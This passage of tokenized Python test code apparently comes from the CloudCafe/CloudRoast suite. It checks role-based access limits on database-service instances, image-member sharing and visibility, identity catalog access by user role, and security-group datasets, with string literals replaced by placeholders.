httpCode ) ) <EOL> self . dbaas_creator . root . is_root_enabled ( self . creator_instance_id ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . instances . resize_instance ( <EOL> self . creator_instance_id , <EOL> next_flavor ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . instances . restart ( self . creator_instance_id ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_creator ) <EOL> self . 
assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . instances . resize_volume ( <EOL> self . creator_instance_id , <EOL> resize_vol ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_creator . instances . get ( <EOL> self . creator_instance_id ) . delete ( ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> def test_rbac_database_observer_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : db_name } ] <EOL> try : <EOL> self . dbaas_observer . databases . create ( self . creator_instance_id , <EOL> db_body ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . databases . list ( <EOL> self . dbaas_observer . instances . get ( self . creator_instance_id ) ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_observer . databases . delete ( self . 
creator_instance_id , <EOL> db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> def test_rbac_users_observer_rights ( self ) : <EOL> db_name = "<STR_LIT>" <EOL> db_body = [ { "<STR_LIT:name>" : db_name } ] <EOL> user_name = "<STR_LIT>" <EOL> user_body = [ { "<STR_LIT>" : db_body , "<STR_LIT:name>" : user_name , <EOL> "<STR_LIT:password>" : "<STR_LIT:password>" } ] <EOL> try : <EOL> self . dbaas_observer . users . create ( self . creator_instance_id , <EOL> user_body ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . users . list ( <EOL> self . dbaas_observer . instances . get ( self . creator_instance_id ) ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_observer . users . delete ( self . creator_instance_id , db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . users . list_access ( self . creator_instance_id , <EOL> user_name ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . 
assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_observer . users . revoke ( self . creator_instance_id , <EOL> user_name , <EOL> db_name ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> _db_list = [ db_name ] <EOL> self . dbaas_observer . users . grant ( self . creator_instance_id , <EOL> user_name , <EOL> _db_list ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> user_body [ <NUM_LIT:0> ] [ '<STR_LIT:password>' ] = "<STR_LIT>" <EOL> self . dbaas_observer . users . change_passwords ( <EOL> self . creator_instance_id , <EOL> user_body ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> def test_rbac_instance_observer_rights ( self ) : <EOL> next_flavor = <NUM_LIT:1> <EOL> resize_vol = <NUM_LIT:5> <EOL> try : <EOL> self . dbaas_observer . instances . list ( ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_observer . instances . get ( self . creator_instance_id ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . 
dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) <EOL> try : <EOL> self . dbaas_observer . root . create ( self . creator_instance_id ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> self . dbaas_observer . root . is_root_enabled ( self . creator_instance_id ) <EOL> httpCode = self . behavior . get_last_response_code ( self . dbaas_creator ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . behavior . create_active_instance ( self . dbaas_observer ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . instances . get ( <EOL> self . creator_instance_id ) . delete ( ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . instances . resize_instance ( <EOL> self . creator_instance_id , <EOL> next_flavor ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . instances . 
restart ( self . creator_instance_id ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . instances . resize_volume ( <EOL> self . creator_instance_id , <EOL> resize_vol ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> try : <EOL> self . dbaas_observer . instances . get ( <EOL> self . creator_instance_id ) . delete ( ) <EOL> raise Exception <EOL> except Exception as e : <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> def test_rbac_flavors_observer_rights ( self ) : <EOL> expectedFlavorRamName = { <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" } <EOL> try : <EOL> flavorList = self . dbaas_observer . flavors . list ( ) <EOL> httpCode = self . behavior . get_last_response_code ( <EOL> self . dbaas_observer ) <EOL> self . assertTrue ( httpCode == '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT>' , httpCode ) ) <EOL> actualFlavorRamName = { } <EOL> self . assertIsNotNone ( flavorList , "<STR_LIT>" ) <EOL> for flavor in flavorList : <EOL> self . assertIsNotNone ( flavor . id , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . links , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . name , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( flavor . 
ram , "<STR_LIT>" ) <EOL> actualFlavorRamName [ flavor . ram ] = str ( flavor . name ) <EOL> self . assertEqual ( expectedFlavorRamName , <EOL> actualFlavorRamName , <EOL> "<STR_LIT>" <EOL> % ( expectedFlavorRamName , actualFlavorRamName ) ) <EOL> except Exception as e : <EOL> self . fail ( e ) </s>
<s> """<STR_LIT>""" <EOL> import calendar <EOL> import time <EOL> from cloudcafe . common . tools . datagen import rand_name <EOL> from cloudcafe . glance . common . constants import Messages <EOL> from cloudcafe . glance . common . types import ImageMemberStatus <EOL> from cloudroast . glance . fixtures import ImagesFixture <EOL> class ListImageMembers ( ImagesFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( ListImageMembers , cls ) . setUpClass ( ) <EOL> cls . alt_member_id = cls . images_alt_one . auth . tenant_id <EOL> cls . alt_two_member_id = cls . images_alt_two . auth . tenant_id <EOL> created_images = cls . images . behaviors . create_images_via_task ( <EOL> image_properties = { '<STR_LIT:name>' : rand_name ( '<STR_LIT>' ) } , <EOL> count = <NUM_LIT:6> ) <EOL> cls . shared_image = created_images . pop ( ) <EOL> cls . images . client . create_image_member ( <EOL> cls . shared_image . id_ , cls . alt_member_id ) <EOL> cls . images . client . create_image_member ( <EOL> cls . shared_image . id_ , cls . alt_two_member_id ) <EOL> cls . image_member_created_at_time_in_sec = ( <EOL> calendar . timegm ( time . gmtime ( ) ) ) <EOL> cls . alt_shared_image = created_images . pop ( ) <EOL> cls . images . client . create_image_member ( <EOL> cls . alt_shared_image . id_ , cls . alt_member_id ) <EOL> cls . images . client . create_image_member ( <EOL> cls . alt_shared_image . id_ , cls . alt_two_member_id ) <EOL> cls . no_access_image = created_images . pop ( ) <EOL> cls . delete_image = created_images . pop ( ) <EOL> cls . images . client . delete_image ( cls . delete_image . id_ ) <EOL> cls . deactivated_image = created_images . pop ( ) <EOL> cls . images . client . create_image_member ( <EOL> cls . deactivated_image . id_ , cls . alt_member_id ) <EOL> cls . images_admin . client . deactivate_image ( cls . deactivated_image . id_ ) <EOL> cls . reactivated_image = created_images . pop ( ) <EOL> cls . images . client . 
create_image_member ( <EOL> cls . reactivated_image . id_ , cls . alt_member_id ) <EOL> cls . images_admin . client . deactivate_image ( cls . reactivated_image . id_ ) <EOL> cls . images_admin . client . reactivate_image ( cls . reactivated_image . id_ ) <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> cls . images . behaviors . resources . release ( ) <EOL> super ( ListImageMembers , cls ) . tearDownClass ( ) <EOL> def test_list_image_members_all_member_statuses ( self ) : <EOL> """<STR_LIT>""" <EOL> status = { '<STR_LIT>' : ImageMemberStatus . ALL } <EOL> resp = self . images . client . list_image_members ( <EOL> image_id = self . shared_image . id_ , params = status ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT:200> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT:200> , resp . status_code ) ) <EOL> listed_image_members = resp . entity <EOL> self . assertEqual ( <EOL> len ( listed_image_members ) , <NUM_LIT:2> , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( len ( listed_image_members ) ) ) <EOL> def test_list_image_members_using_deactivated_image ( self ) : <EOL> """<STR_LIT>""" <EOL> image_member_ids = [ ] <EOL> errors = [ ] <EOL> resp = self . images . client . list_image_members ( <EOL> self . deactivated_image . id_ ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT:200> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT:200> , resp . status_code ) ) <EOL> listed_image_members = resp . entity <EOL> self . assertEqual ( <EOL> len ( listed_image_members ) , <NUM_LIT:1> , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( len ( listed_image_members ) ) ) <EOL> [ image_member_ids . append ( image_member . member_id ) <EOL> for image_member in listed_image_members ] <EOL> self . assertIn ( <EOL> self . alt_member_id , image_member_ids , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( self . 
alt_member_id , image_member_ids ) ) <EOL> for image_member in listed_image_members : <EOL> errors = self . images . behaviors . validate_image_member ( image_member ) <EOL> self . assertEqual ( <EOL> errors , [ ] , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( self . deactivated_image . id_ , <EOL> errors ) ) <EOL> def test_list_image_members_using_reactivated_image ( self ) : <EOL> """<STR_LIT>""" <EOL> image_member_ids = [ ] <EOL> errors = [ ] <EOL> resp = self . images . client . list_image_members ( <EOL> self . reactivated_image . id_ ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT:200> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT:200> , resp . status_code ) ) <EOL> listed_image_members = resp . entity <EOL> self . assertEqual ( <EOL> len ( listed_image_members ) , <NUM_LIT:1> , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( len ( listed_image_members ) ) ) <EOL> [ image_member_ids . append ( image_member . member_id ) <EOL> for image_member in listed_image_members ] <EOL> self . assertIn ( <EOL> self . alt_member_id , image_member_ids , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( self . alt_member_id , image_member_ids ) ) <EOL> for image_member in listed_image_members : <EOL> errors = self . images . behaviors . validate_image_member ( image_member ) <EOL> self . assertEqual ( <EOL> errors , [ ] , <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( self . reactivated_image . id_ , <EOL> errors ) ) <EOL> def test_list_image_members_using_invalid_image_id ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . images . client . list_image_members ( image_id = '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT> , resp . status_code ) ) <EOL> def test_list_image_members_using_blank_image_id ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . images . client . 
list_image_members ( image_id = '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT> , resp . status_code ) ) <EOL> def test_list_image_members_using_deleted_image ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . images . client . list_image_members ( self . delete_image . id_ ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT> , resp . status_code ) ) <EOL> def test_list_image_members_as_tenant_without_access_to_image ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . images_alt_two . client . list_image_members ( <EOL> self . no_access_image . id_ ) <EOL> self . assertEqual ( <EOL> resp . status_code , <NUM_LIT> , <EOL> Messages . STATUS_CODE_MSG . format ( <NUM_LIT> , resp . status_code ) ) <EOL> self . assertIsNone ( resp . entity , msg = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( resp . entity ) ) <EOL> def _validate_image_member ( self , image_member ) : <EOL> """<STR_LIT>""" <EOL> errors = [ ] <EOL> created_at_delta = self . images . behaviors . get_time_delta ( <EOL> self . image_member_created_at_time_in_sec , image_member . created_at ) <EOL> updated_at_delta = self . images . behaviors . get_time_delta ( <EOL> self . image_member_created_at_time_in_sec , image_member . updated_at ) <EOL> if created_at_delta > self . images . config . max_created_at_delta : <EOL> errors . append ( Messages . PROPERTY_MSG . format ( <EOL> '<STR_LIT>' , self . images . config . max_created_at_delta , <EOL> created_at_delta ) ) <EOL> if image_member . image_id != self . shared_image . id_ : <EOL> errors . append ( Messages . PROPERTY_MSG . format ( <EOL> '<STR_LIT>' , self . shared_image . id_ , <EOL> image_member . image_id ) ) <EOL> if ( image_member . member_id != self . alt_member_id and <EOL> image_member . member_id != self . alt_two_member_id ) : <EOL> errors . append ( Messages . PROPERTY_MSG . 
format ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( self . alt_member_id , <EOL> self . alt_two_member_id ) , <EOL> image_member . member_id ) ) <EOL> if image_member . status != ImageMemberStatus . PENDING : <EOL> errors . append ( Messages . PROPERTY_MSG . format ( <EOL> '<STR_LIT:status>' , ImageMemberStatus . PENDING , image_member . status ) ) <EOL> if updated_at_delta > self . images . config . max_updated_at_delta : <EOL> errors . append ( Messages . PROPERTY_MSG . format ( <EOL> '<STR_LIT>' , self . images . config . max_updated_at_delta , <EOL> updated_at_delta ) ) <EOL> return errors </s>
<s> from cafe . drivers . unittest . datasets import DatasetList <EOL> from cafe . drivers . unittest . decorators import tags , DataDrivenClass <EOL> from cloudcafe . identity . config import ( <EOL> ServiceAdmin , IdentityAdmin , UserAdmin , UserManage , DefaultUser ) <EOL> from cloudroast . identity . v3 . fixture import IdentityV3Fixture <EOL> class UserDataset ( DatasetList ) : <EOL> def __init__ ( self ) : <EOL> test_cases = [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT:data>" : { <EOL> "<STR_LIT>" : <NUM_LIT:200> , <EOL> "<STR_LIT>" : ServiceAdmin } } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT:data>" : { <EOL> "<STR_LIT>" : <NUM_LIT:200> , <EOL> "<STR_LIT>" : IdentityAdmin } } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT:data>" : { <EOL> "<STR_LIT>" : <NUM_LIT:200> , <EOL> "<STR_LIT>" : UserAdmin } } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT:data>" : { <EOL> "<STR_LIT>" : <NUM_LIT:200> , <EOL> "<STR_LIT>" : UserManage } } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT:data>" : { <EOL> "<STR_LIT>" : <NUM_LIT:200> , <EOL> "<STR_LIT>" : DefaultUser } } ] <EOL> for test_case in test_cases : <EOL> self . append_new_dataset ( test_case [ "<STR_LIT:name>" ] , test_case [ "<STR_LIT:data>" ] ) <EOL> @ DataDrivenClass ( UserDataset ( ) ) <EOL> class TestCatalog ( IdentityV3Fixture ) : <EOL> """<STR_LIT>""" <EOL> get_service_catalog_resp = None <EOL> user_config = None <EOL> catalog_is_empty = False <EOL> @ tags ( '<STR_LIT>' , type = '<STR_LIT>' ) <EOL> def test_get_service_catalog ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . v3_composite . apis . catalog . client . get_catalog ( ) <EOL> self . assertEqual ( resp . status_code , self . get_service_catalog_resp ) <EOL> self . assertEqual ( "<STR_LIT>" . format ( <EOL> self . v3_composite . ident_config . global_authentication_endpoint ) , <EOL> resp . entity . links . self_ ) <EOL> self . 
_verify_catalog_response ( catalog_response = resp , <EOL> catalog_is_empty = self . catalog_is_empty ) <EOL> @ tags ( '<STR_LIT>' , type = '<STR_LIT>' ) <EOL> def test_list_users ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . v3_composite . apis . users . client . list_users ( ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from cafe . drivers . unittest . decorators import tags <EOL> from cloudcafe . images . common . types import ImageMemberStatus <EOL> from cloudroast . images . fixtures import ImagesFixture <EOL> class TestGetImageMemberPositive ( ImagesFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestGetImageMemberPositive , cls ) . setUpClass ( ) <EOL> cls . images = cls . images_behavior . create_images_via_task ( count = <NUM_LIT:2> ) <EOL> @ tags ( type = '<STR_LIT>' , regression = '<STR_LIT:true>' ) <EOL> def test_get_image_member_as_member_image_shared_with ( self ) : <EOL> """<STR_LIT>""" <EOL> member_id = self . alt_tenant_id <EOL> image = self . images . pop ( ) <EOL> response = self . images_client . add_member ( image . id_ , member_id ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> member = response . entity <EOL> response = self . alt_images_client . get_member ( <EOL> image . id_ , member . member_id ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> get_member = response . entity <EOL> self . images_behavior . validate_image_member ( <EOL> image . id_ , get_member , member . member_id ) <EOL> @ tags ( type = '<STR_LIT>' , regression = '<STR_LIT:true>' ) <EOL> def test_get_image_member_membership_states ( self ) : <EOL> """<STR_LIT>""" <EOL> member_id = self . alt_tenant_id <EOL> image = self . images . pop ( ) <EOL> membership_states = [ <EOL> ImageMemberStatus . PENDING , ImageMemberStatus . ACCEPTED , <EOL> ImageMemberStatus . REJECTED ] <EOL> response = self . images_client . add_member ( image . id_ , member_id ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> member = response . entity <EOL> for state in membership_states : <EOL> if state != ImageMemberStatus . PENDING : <EOL> response = self . alt_images_client . update_member ( <EOL> image . id_ , member_id , state ) <EOL> self . assertEqual ( response . 
status_code , <NUM_LIT:200> ) <EOL> response = self . images_client . get_member ( <EOL> image . id_ , member . member_id ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> get_member = response . entity <EOL> self . assertEqual ( get_member . status , state ) <EOL> self . images_behavior . validate_image_member ( <EOL> image . id_ , get_member , member . member_id ) </s>
<s> """<STR_LIT>""" <EOL> from cafe . drivers . unittest . decorators import tags <EOL> from cloudcafe . compute . common . exceptions import ( <EOL> BadRequest , Forbidden , ItemNotFound ) <EOL> from cloudcafe . images . common . types import ImageMemberStatus , ImageVisibility <EOL> from cloudroast . images . fixtures import ImagesFixture <EOL> class ImageVisibilityLifeCycleTest ( ImagesFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( ImageVisibilityLifeCycleTest , cls ) . setUpClass ( ) <EOL> cls . image = cls . images_behavior . create_image_via_task ( ) <EOL> @ tags ( type = '<STR_LIT>' , regression = '<STR_LIT:true>' ) <EOL> def test_image_visibility_life_cycle ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . image . visibility , ImageVisibility . PRIVATE ) <EOL> response = self . images_client . get_image ( image_id = self . image . id_ ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> get_image = response . entity <EOL> self . assertEqual ( get_image , self . image ) <EOL> with self . assertRaises ( ItemNotFound ) : <EOL> self . alt_images_client . get_image ( image_id = self . image . id_ ) <EOL> images = self . alt_images_behavior . list_images_pagination ( ) <EOL> self . assertNotIn ( self . image , images ) <EOL> response = self . images_client . add_member ( <EOL> image_id = self . image . id_ , member_id = self . alt_tenant_id ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> member = response . entity <EOL> self . assertEqual ( member . member_id , self . alt_tenant_id ) <EOL> self . assertEqual ( member . status , ImageMemberStatus . PENDING ) <EOL> response = self . alt_images_client . get_image ( image_id = self . image . id_ ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> images = self . alt_images_behavior . list_images_pagination ( ) <EOL> self . assertNotIn ( self . image , images ) <EOL> with self . 
assertRaises ( Forbidden ) : <EOL> self . images_client . update_image ( <EOL> image_id = self . image . id_ , <EOL> remove = { "<STR_LIT>" : ImageVisibility . PUBLIC } ) <EOL> with self . assertRaises ( Forbidden ) : <EOL> self . alt_images_client . update_image ( <EOL> image_id = self . image . id_ , <EOL> replace = { "<STR_LIT>" : ImageVisibility . PUBLIC } ) <EOL> with self . assertRaises ( BadRequest ) : <EOL> self . images_client . update_image ( <EOL> image_id = self . image . id_ , <EOL> replace = { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> response = self . alt_images_client . update_member ( <EOL> image_id = self . image . id_ , member_id = self . alt_tenant_id , <EOL> status = ImageMemberStatus . ACCEPTED ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> member = response . entity <EOL> self . assertEqual ( member . member_id , self . alt_tenant_id ) <EOL> self . assertEqual ( member . status , ImageMemberStatus . ACCEPTED ) <EOL> response = self . alt_images_client . get_image ( image_id = self . image . id_ ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> get_image = response . entity <EOL> self . assertEqual ( get_image , self . image ) <EOL> images = self . alt_images_behavior . list_images_pagination ( ) <EOL> self . assertIn ( self . image , images ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from cafe . drivers . unittest . datasets import DatasetList <EOL> from cafe . drivers . unittest . decorators import DataDrivenFixture , data_driven_test , tags <EOL> from cloudcafe . networking . networks . config import NetworkingSecondUserConfig <EOL> from cloudroast . networking . networks . fixtures import NetworkingSecurityGroupsFixture <EOL> from cloudcafe . networking . networks . extensions . security_groups_api . constants import SecurityGroupsErrorTypes , SecurityGroupsResponseCodes <EOL> data_set_list = DatasetList ( ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ 